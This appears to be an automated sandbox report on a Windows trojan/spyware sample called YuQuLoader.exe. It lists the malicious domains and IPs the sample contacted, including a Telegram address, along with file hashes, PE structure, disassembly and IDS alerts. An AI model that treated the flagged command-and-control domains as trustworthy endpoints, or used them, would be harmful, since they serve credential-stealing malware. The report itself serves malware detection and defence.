                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchYuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://duckduckgo.com/chrome_newtabv209hYuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refYuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://support.mozilla.org/products/firefoxgro.allYuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://gemini.google.com/app?q=YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://mrodularmall.top/YuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618503724.0000000001664000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681284940.0000000001655000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681714373.0000000001663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://mrodularmall.top/aNzSrmalYuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589579772.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1652000979.00000000015DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://mrodularmall.top/aRYuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                104.21.93.43
                                                                                		featureccus.shopUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                104.21.112.1
                                                                                		mrodularmall.topUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                149.154.167.99
                                                                                		t.meUnited Kingdom
                                                                                		62041TELEGRAMRUfalse

                                                                                General Information

                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                Analysis ID:1635448
                                                                                Start date and time:2025-03-11 17:22:25 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 8m 10s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:14
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:YuQuLoader.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@5/6@4/3
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 91%
                                                                                • Number of executed functions: 17
                                                                                • Number of non-executed functions: 137
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 104.40.69.76, 20.190.159.129, 4.175.87.197, 150.171.28.10, 2.23.227.208
                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobvmssprdwus03.westus.cloudapp.azure.com, g.bing.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                12:23:27API Interceptor8x Sleep call for process: YuQuLoader.exe modified
                                                                                12:23:31API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                No context

                                                                                Domains

                                                                                No context

                                                                                ASNs

                                                                                No context

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YuQuLoader.exe_eb94811bf36a15b71549e366bc498234682a_51c79b14_79f16577-9413-4d66-b73b-8782627dce99\Report.wer

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):65536
                                                                                Entropy (8bit):0.7210420381089234
                                                                                Encrypted:false
                                                                                SSDEEP:96:6XF/PesMhwoI7RM6tQXIDcQvc6QcEVcw3cE/H+HbHg/TgJ3YOZUXOyK/ZAX/d5FN:Yte10BU/Aj/+zuiFaZ24IO8e8
                                                                                MD5:D24435447480ADABF582F39E6D2D516E
                                                                                SHA1:B25F02D388E284E549F152745364DD028163C891
                                                                                SHA-256:915D99CAA16A731DBD423DB54458C36A8777E5E44395B69B67FDA3D2D2BC73C7
                                                                                SHA-512:A950612FF08E138183DAA2AA65871A3B8C5EED87D80B6B7471490E4B22B25DEC8FE9E7B11E393CE8DF3C6A5A3E6EBFFC2D3686594D247CD49263267C8AF237E9
                                                                                Malicious:true
                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.1.8.3.8.0.5.1.8.5.6.9.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.1.8.3.8.0.5.8.2.6.3.2.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.f.1.6.5.7.7.-.9.4.1.3.-.4.d.6.6.-.b.7.3.b.-.8.7.8.2.6.2.7.d.c.e.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.5.a.2.c.3.f.-.7.0.a.6.-.4.6.d.4.-.a.7.1.f.-.7.8.c.3.c.d.1.3.4.9.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.u.Q.u.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.1.a.0.-.0.0.0.1.-.0.0.1.8.-.9.d.d.e.-.9.a.e.9.a.1.9.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.d.3.d.c.7.5.d.5.c.7.4.7.b.6.7.5.3.1.b.d.9.5.5.0.5.6.4.9.6.b.d.0.0.0.0.f.f.f.f.!.0.0.0.0.7.6.0.e.8.6.b.2.8.b.8.a.7.6.f.d.4.7.a.9.a.3.1.b.7.1.1.b.5.8.4.8.0.0.8.8.b.6.a.a.!.Y.u.Q.u.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER44FE.tmp.dmp

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:Mini DuMP crash report, 14 streams, Tue Mar 11 16:23:25 2025, 0x1205a4 type
                                                                                Category:dropped
                                                                                Size (bytes):38066
                                                                                Entropy (8bit):1.7183156707880904
                                                                                Encrypted:false
                                                                                SSDEEP:96:5e89doHl3tb+1tXhyRxlqQMi7O0tWZzt6Aqf4V1aWIkWIe/PIuuEsH4ue7M6uWz1:DX0xkQMO+t6Rf4rUEEsHc75dz
                                                                                MD5:1B08384E307B02D3581D7D73F4658CC3
                                                                                SHA1:1B365C46087FCCCA1A0C23D4035BEDC0808739B9
                                                                                SHA-256:CE30329A2A448D0034B4D16FD17389CEC7616B9D19D7A51000624E22D4BB0D69
                                                                                SHA-512:A38612E991218D6F798CE73FDE7EE220FEFD0DB1EB99185A7022EA4DD624DFDF8599AAB251422DE79F9E8AACF470EC8C07BE065DF1ED0AA2F2E9294F53C3CD88
                                                                                Malicious:false
                                                                                Preview:MDMP..a..... .......}c.g........................0...............f...........T.......8...........T......................................................................................................................eJ......P.......GenuineIntel............T........!..|c.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4608.tmp.WERInternalMetadata.xml

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8402
                                                                                Entropy (8bit):3.698684577626318
                                                                                Encrypted:false
                                                                                SSDEEP:192:R6l7wVeJGje6N8c6YVkfSUdI4gmfRoprp89bd1sfsfm:R6lXJIe616Y6fSUdfgmfRbdOf5
                                                                                MD5:B23C96B311D75A1C0F2F85C2B68CF668
                                                                                SHA1:E37E5C63B97B5CEDA71214D1247CB7BA70F5DFCE
                                                                                SHA-256:36C0B1F9C7D70B4A468E468C03C81B93020013BAAD762AE23E82C22FB32ADA82
                                                                                SHA-512:D4C44C4778395F9FEB29FD825D2769F8A5C8297A9ED4CDDAF710B6F5617767E717B7BCBAD3AD420F524AAC1C4528A9938E61AFDB3534CD19C744BC1E40BDFB21
                                                                                Malicious:false
                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.6.0.8.<./.P.i.

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4638.tmp.xml

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):4720
                                                                                Entropy (8bit):4.485358673966274
                                                                                Encrypted:false
                                                                                SSDEEP:48:cvIwWl8zsyJg77aI99qWOa8tQYm8M4JNiF6+q8vxZz0kaFd:uIjfAI7zLOlDJHKzz0kaFd
                                                                                MD5:6A81577556510AE816B3F754FB1D0D08
                                                                                SHA1:1B146B237D8AEF39DCD1BD610751694FF230C8C2
                                                                                SHA-256:691D1DB3DC5BFC528677E04521A77D69E26AF56EBC902B5E86ED01F83003540F
                                                                                SHA-512:82BD57D25E111F9F96B2A88D5ADA6433851E9AC66C54C6D4F23D7FF411FE559CA137729B4C66BAC6EF49DCB0FEA57CAD179EC8331208991A62E47EBB0FE9BD76
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="756446" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1835008
                                                                                Entropy (8bit):4.465272453274313
                                                                                Encrypted:false
                                                                                SSDEEP:6144:4hyS6Wwrm/Ivk8bWdx0W0cAdQa8WMFlnOvAeoMqWu8O/RRhD55dqXanhE:UyJKF0fBvAexuTLdbd5hE
                                                                                MD5:D0146D7329E2A3CC4B3FCB5D6589430B
                                                                                SHA1:CA19AE08FB68992BE9C020140167D005A7A7AE24
                                                                                SHA-256:0EDF0BBBCD221ABB53D9A53E343D6469F0EC06145419B9078F9FBE4D1E3E3A5D
                                                                                SHA-512:D953EF9878FB735BB49367E280D35153E8C450AA27FB6E642298E13AB69FAF89FFB5B64BC7E5DD1FB7DAC07408A3045BE9276C02813A96AC6F03A0932595E553
                                                                                Malicious:false
                                                                                Preview:regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;..b...............................................................................................................................................................................................................................................................................................................................................:>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):57344
                                                                                Entropy (8bit):3.588725221045388
                                                                                Encrypted:false
                                                                                SSDEEP:768:F3fG0XLQf5atI6/i63hpHhuhMRPv4tZ0CVY2M2TPA2Gv+svyfRouyNWiW2:F3+0c5atrIG4tMQzA3a2
                                                                                MD5:5C023FDE65E361BEE0DC7F6E40272776
                                                                                SHA1:B11E7F20BB9E59CF918D79D571BCAD92E56053C7
                                                                                SHA-256:68CC42C801079A1342D20FB9F0C9D863FACE451B719AC03A25DBB5F476A05E6C
                                                                                SHA-512:B0FF44B113ECB470C59FFD58BF77E75A72178DA2F8C0A8CF38F2C9E35CD31FC84DC3D2EEE04A732ABFFB0FD59E15C1DB0875A4EEB4DC70F761F0A140ECE02E78
                                                                                Malicious:false
                                                                                Preview:regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;..b...............................................................................................................................................................................................................................................................................................................................................<>..HvLE........K...........-S..o:9.f.....3......................................................0..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........@...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. .

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.688909846433308
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:YuQuLoader.exe
                                                                                File size:1'362'432 bytes
                                                                                MD5:849c830e2af83f171e9607e3d2e7f694
                                                                                SHA1:760e86b28b8a76fd47a9a31b711b58480088b6aa
                                                                                SHA256:350d0f5dba0941904595a2f132cc43af3d23a1a7aa6ee272b9dd0408d2b58022
                                                                                SHA512:188d068bcf78a5873db52fd974e10ec3cd64bc275d2a55de79265549e777d134d8983f7fa378aef0db38f4800656b62d0576ec48c3b334c6fd93eef08e819283
                                                                                SSDEEP:24576:ytDu8+zlhIFWnPszfYWlWknrfRisJrWknrfRisJ:aujhIFWnPszfzAknos8knos
                                                                                TLSH:8E55E17270C1D073FB45A6B235A9E3B4146BF673DA2D0FC7A2B4E33890486D1179A52E
                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....3.g............................b.............@.......................................@.................................@6..<..

                                                                                File Icon

                                                                                Icon Hash:90cececece8e8eb0

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x46e162
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows cui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x67D033A8 [Tue Mar 11 12:59:20 2025 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:0
                                                                                File Version Major:6
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:d462aa757f68629e41b3df6e6d4c6a3c

                                                                                Authenticode Signature

                                                                                Signature Valid:
                                                                                Signature Issuer:
                                                                                Signature Validation Error:
                                                                                Error Number:
                                                                                Not Before, Not After
                                                                                  Subject Chain
                                                                                    Version:
                                                                                    Thumbprint MD5:
                                                                                    Thumbprint SHA-1:
                                                                                    Thumbprint SHA-256:
                                                                                    Serial:

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    call 00007FF4347E21CAh
                                                                                    jmp 00007FF4347E2039h
                                                                                    mov ecx, dword ptr [00496840h]
                                                                                    push esi
                                                                                    push edi
                                                                                    mov edi, BB40E64Eh
                                                                                    mov esi, FFFF0000h
                                                                                    cmp ecx, edi
                                                                                    je 00007FF4347E21C6h
                                                                                    test esi, ecx
                                                                                    jne 00007FF4347E21E8h
                                                                                    call 00007FF4347E21F1h
                                                                                    mov ecx, eax
                                                                                    cmp ecx, edi
                                                                                    jne 00007FF4347E21C9h
                                                                                    mov ecx, BB40E64Fh
                                                                                    jmp 00007FF4347E21D0h
                                                                                    test esi, ecx
                                                                                    jne 00007FF4347E21CCh
                                                                                    or eax, 00004711h
                                                                                    shl eax, 10h
                                                                                    or ecx, eax
                                                                                    mov dword ptr [00496840h], ecx
                                                                                    not ecx
                                                                                    pop edi
                                                                                    mov dword ptr [00496880h], ecx
                                                                                    pop esi
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 14h
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    xorps xmm0, xmm0
                                                                                    push eax
                                                                                    movlpd qword ptr [ebp-0Ch], xmm0
                                                                                    call dword ptr [00493874h]
                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                    xor eax, dword ptr [ebp-0Ch]
                                                                                    mov dword ptr [ebp-04h], eax
                                                                                    call dword ptr [00493834h]
                                                                                    xor dword ptr [ebp-04h], eax
                                                                                    call dword ptr [00493830h]
                                                                                    xor dword ptr [ebp-04h], eax
                                                                                    lea eax, dword ptr [ebp-14h]
                                                                                    push eax
                                                                                    call dword ptr [004938BCh]
                                                                                    mov eax, dword ptr [ebp-10h]
                                                                                    lea ecx, dword ptr [ebp-04h]
                                                                                    xor eax, dword ptr [ebp-14h]
                                                                                    xor eax, dword ptr [ebp-04h]
                                                                                    xor eax, ecx
                                                                                    leave
                                                                                    ret
                                                                                    mov eax, 00004000h
                                                                                    ret
                                                                                    push 00498490h
                                                                                    call dword ptr [00493894h]
                                                                                    ret
                                                                                    push 00030000h
                                                                                    push 00010000h
                                                                                    push 00000000h
                                                                                    call 00007FF4347E8D15h
                                                                                    add esp, 0Ch

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x936400x3c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x996000x4540
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000x4200.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x8fb280x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8bf980xc0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x937d00x154.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x895b00x89600fb36ad69e14a6c917944505732e0e813False0.5275872241810737data7.096196420710893IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x8b0000xa10c0xa200c5801beefe9ecbfe85de02d188201215False0.4246961805555556data4.905614798698849IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x960000x2c5c0x1600233e04c81724f6e0f553a5dbb15f0a09False0.4073153409090909data4.744840434225013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .tls0x990000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .reloc0x9a0000x42000x42001777306920e23a668027a33d6310b99aFalse0.7994791666666666data6.743739266198223IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    .bss0x9f0000x576000x57600d84f28e91e147230dd176c41fa59cc45False1.0003241237482117data7.999496476862304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .bss0xf70000x576000x57600d84f28e91e147230dd176c41fa59cc45False1.0003241237482117data7.999496476862304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                    ole32.dllOleDraw

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-03-11T17:23:27.701362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711149.154.167.99443TCP
                                                                                    2025-03-11T17:23:29.701106+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713104.21.93.43443TCP
                                                                                    2025-03-11T17:23:32.032770+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714104.21.112.1443TCP
                                                                                    2025-03-11T17:23:35.627519+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716104.21.112.1443TCP
                                                                                    2025-03-11T17:23:38.809453+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549717104.21.112.1443TCP
                                                                                    2025-03-11T17:23:41.948508+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549718104.21.112.1443TCP
                                                                                    2025-03-11T17:23:46.175894+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549721104.21.112.1443TCP
                                                                                    2025-03-11T17:23:49.894407+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549723104.21.112.1443TCP
                                                                                    2025-03-11T17:23:55.565780+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549725104.21.112.1443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
